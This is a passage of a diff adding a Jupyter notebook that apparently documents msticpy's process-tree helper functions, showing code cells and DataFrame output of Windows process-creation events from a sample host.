+     "start_time": "2020-08-25T15:53:47.143997Z"
+    },
+    "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a",
+    "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)",
+    "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6"
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectLogonId</th>\n",
+       "      <th>NewProcessId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>source_index_par</th>\n",
+       "      <th>ProcessId_par</th>\n",
+       "      <th>NewProcessName_par</th>\n",
+       "      <th>timestamp_orig_par</th>\n",
+       "      <th>parent_key</th>\n",
+       "      <th>IsRoot</th>\n",
+       "      <th>IsLeaf</th>\n",
+       "      <th>IsBranch</th>\n",
+       "      <th>path</th>\n",
+       "      <th>parent_index</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>proc_key</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x1c54|2019-02-09 22:11:59.877000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 22:11:59.877000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x1c54</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/69</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:16:28.153000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x123c</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/103</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\secagent\\wasecagentprov.exe|0xda8|2019-02-09 23:55:46.057000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:55:46.057000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0xda8</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/123</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x7fc|2019-02-10 00:22:33.813000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-10 00:22:33.813000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x7fc</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/134</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x172c|2019-02-10 01:27:25.173000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-10 01:27:25.173000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x172c</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/343</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 35 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                                TenantId  \\\n",
+       "proc_key                                                                                   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "\n",
+       "                                                                       Account  \\\n",
+       "proc_key                                                                         \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   EventID  \\\n",
+       "proc_key                                                     \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...    4688   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "\n",
+       "                                                                      TimeGenerated  \\\n",
+       "proc_key                                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 22:11:59.877000+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 23:16:28.153000+00:00   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd... 2019-02-09 23:55:46.057000+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-10 00:22:33.813000+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-10 01:27:25.173000+00:00   \n",
+       "\n",
+       "                                                           Computer  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "\n",
+       "                                                   SubjectUserSid  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...       S-1-5-18   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "\n",
+       "                                                     SubjectUserName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   SubjectDomainName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...         WORKGROUP   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "\n",
+       "                                                   SubjectLogonId  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...          0x3e7   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "\n",
+       "                                                   NewProcessId  ...  \\\n",
+       "proc_key                                                         ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x1c54  ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x123c  ...   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...        0xda8  ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...        0x7fc  ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x172c  ...   \n",
+       "\n",
+       "                                                   source_index_par  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...              NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "\n",
+       "                                                   ProcessId_par  \\\n",
+       "proc_key                                                           \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...           NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "\n",
+       "                                                   NewProcessName_par  \\\n",
+       "proc_key                                                                \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaN   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaN   \n",
+       "\n",
+       "                                                           timestamp_orig_par  \\\n",
+       "proc_key                                                                        \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  1970-01-01 00:00:00+00:00   \n",
+       "\n",
+       "                                                                                           parent_key  \\\n",
+       "proc_key                                                                                                \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "\n",
+       "                                                   IsRoot IsLeaf IsBranch  \\\n",
+       "proc_key                                                                    \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  False  False     True   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "\n",
+       "                                                        path parent_index  \n",
+       "proc_key                                                                   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...   1007/69         1007  \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  1007/103         1007  \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  1007/123         1007  \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  1007/134         1007  \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  1007/343         1007  \n",
+       "\n",
+       "[5 rows x 35 columns]"
+      ]
+     },
+     "execution_count": 14,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Just get the immediate children of the root process\n",
+    "children = ptree.get_children(p_tree_win, t_root)\n",
+    "children.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### get_tree_depth\n",
+    "Get the depth of a tree."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:47.218995Z",
+     "start_time": "2020-08-25T15:53:47.205996Z"
+    },
+    "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a",
+    "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)",
+    "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6"
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "depth of tree is 4\n"
+     ]
+    }
+   ],
+   "source": [
+    "# Get the depth of the full tree\n",
+    "depth = ptree.get_tree_depth(full_tree)\n",
+    "print(f\"depth of tree is {depth}\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### get_parent and get_ancestors\n",
+    "Get the parent process or all ancestors."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:47.281997Z",
+     "start_time": "2020-08-25T15:53:47.220998Z"
+    },
+    "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a",
+    "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)",
+    "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6"
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "parent\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "TenantId                           52b1ab41-869e-4138-9e40-2a4457f09bf0\n",
+       "Account                                      WORKGROUP\\MSTICAlertsWin1$\n",
+       "EventID                                                            4688\n",
+       "TimeGenerated                          2019-02-09 23:20:15.547000+00:00\n",
+       "Computer                                                MSTICAlertsWin1\n",
+       "SubjectUserSid                                                 S-1-5-18\n",
+       "SubjectUserName                                        MSTICAlertsWin1$\n",
+       "SubjectDomainName                                             WORKGROUP\n",
+       "SubjectLogonId                                                    0x3e7\n",
+       "NewProcessId                                                      0xccc\n",
+       "NewProcessName                              C:\\Windows\\System32\\cmd.exe\n",
+       "TokenElevationType                                               %%1936\n",
+       "ProcessId                                                        0x123c\n",
+       "CommandLine                                                       \"cmd\"\n",
+       "ParentProcessName     C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...\n",
+       "TargetLogonId                                                       0x0\n",
+       "SourceComputerId                   263a788b-6526-4cdc-8ed9-d79402fe4aa0\n",
+       "TimeCreatedUtc                               2019-02-09 23:20:15.547000\n",
+       "EffectiveLogonId                                                  0x3e7\n",
+       "new_process_lc                              c:\\windows\\system32\\cmd.exe\n",
+       "Name: c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23:20:15.547000, dtype: object"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "ancestors\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectLogonId</th>\n",
+       "      <th>NewProcessId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>source_index_par</th>\n",
+       "      <th>ProcessId_par</th>\n",
+       "      <th>NewProcessName_par</th>\n",
+       "      <th>timestamp_orig_par</th>\n",
+       "      <th>parent_key</th>\n",
+       "      <th>IsRoot</th>\n",
+       "      <th>IsLeaf</th>\n",
+       "      <th>IsBranch</th>\n",
+       "      <th>path</th>\n",
+       "      <th>parent_index</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>proc_key</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x1994</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaT</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1007</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:16:28.153000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x123c</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/103</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23:20:15.547000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:20:15.547000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0xccc</td>\n",
+       "      <td>...</td>\n",
+       "      <td>986.0</td>\n",
+       "      <td>0x1994</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...</td>\n",
+       "      <td>2019-02-09 23:16:28.153000+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/103/105</td>\n",
+       "      <td>103</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-09 23:20:15.560000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:20:15.560000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x14ec</td>\n",
+       "      <td>...</td>\n",
+       "      <td>988.0</td>\n",
+       "      <td>0x123c</td>\n",
+       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
+       "      <td>2019-02-09 23:20:15.547000+00:00</td>\n",
+       "      <td>c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 2...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>False</td>\n",
+       "      <td>1007/103/105/106</td>\n",
+       "      <td>105</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>4 rows × 35 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                                TenantId  \\\n",
+       "proc_key                                                                                   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                                   NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "\n",
+       "                                                                       Account  \\\n",
+       "proc_key                                                                         \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                         NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   EventID  \\\n",
+       "proc_key                                                     \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
